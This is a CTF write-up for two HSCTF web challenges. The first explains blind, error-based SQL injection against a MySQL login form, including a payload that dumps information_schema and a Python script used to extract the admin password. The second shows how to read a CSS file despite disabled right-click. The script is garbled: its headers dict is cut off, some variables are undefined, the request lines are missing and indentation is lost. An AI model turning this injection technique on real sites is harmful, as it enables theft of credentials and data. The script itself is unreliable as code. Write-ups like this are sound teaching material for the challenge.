# HSCTF - Web

## web/big blind

From the title “Big Blind” I assumed this was some kind of Blind Injection, probably SQL, but I didn’t want to assume anything. Sending a single ' returned a 500 internal server error, backing up my theory that it was probably blind SQL injection.

After trying a few different things, using the sleep function didn’t return an error, but didn’t seem to do anything. I tried other waiting commands like WAITFOR DELAY '0:0:10', dbms_pipe.receive_message(('a'),10), and pg_sleep(10), however, all of these returned errors. This meant that it was probably either SQLlite or MySQL.

I then tested GLOB, a function that is in SQLlite but not MySQL, this returned an error, suggesting that it was MySQL. Because the database was MySQL, I knew that SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') would trigger an error if true, and put it into a python script to attempt to expose the database’s contents.

I used the script to determine the tablename (users) from information_schema.tables, then determined the column names (user, pass) from information_schema.columns, and then finally enumerated the username and password (admin, the flag)

The script is here, I modified it to make it run for each different function, and in this form it is configured for enumerating the flag, which was the last time I used it(sorry if its a bit messy):

import requests
url = "https://big-blind.hsc.tf/"
'Host': 'big-blind.hsc.tf',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '166',
'Origin': 'https://big-blind.hsc.tf',
'Connection': 'close',
'Referer': 'https://big-blind.hsc.tf/',
}

lalph = list(map(chr, range(ord('a'), ord('z')+1)))
Ualph = list(map(chr, range(ord('A'), ord('Z')+1)))
nums = list(range(0,10))
blank = [""]
fullAlph = []
for val in totalPos:
fullAlph.append(str(val))
end = False
thing = 0
dbNames= []
maxi = 50
while thing < maxi:
if(end==True):
end=False

thing+=1
for Char in totalPos:
Char = str(Char)
#print(reqH)
#print(response)
if("<html lang" in str(response.content)):
if(Char == ""):
end=True
break
else:
break
else:

print("Database Names: ")
for name in dbNames:
print(str(name))


## web/NRC (955 solves/107 points)

### Description:

Find the flag :)

no-right-click.hsc.tf

### Solution:

As the link says, there’s no right click on the website; however, with Ctrl+Shift+C we are able to see the developer console. We can navigate to the sources tab and then view useless-files.css:

body {
text-align: center;
font-size: 5rem;
font-family: 'Abril Fatface', cursive;
}
.small {
margin-top: 50vh;
font-size: 0.5rem;
}
/* cause i disabled it in index.js */
/* no right click = n.r.c. */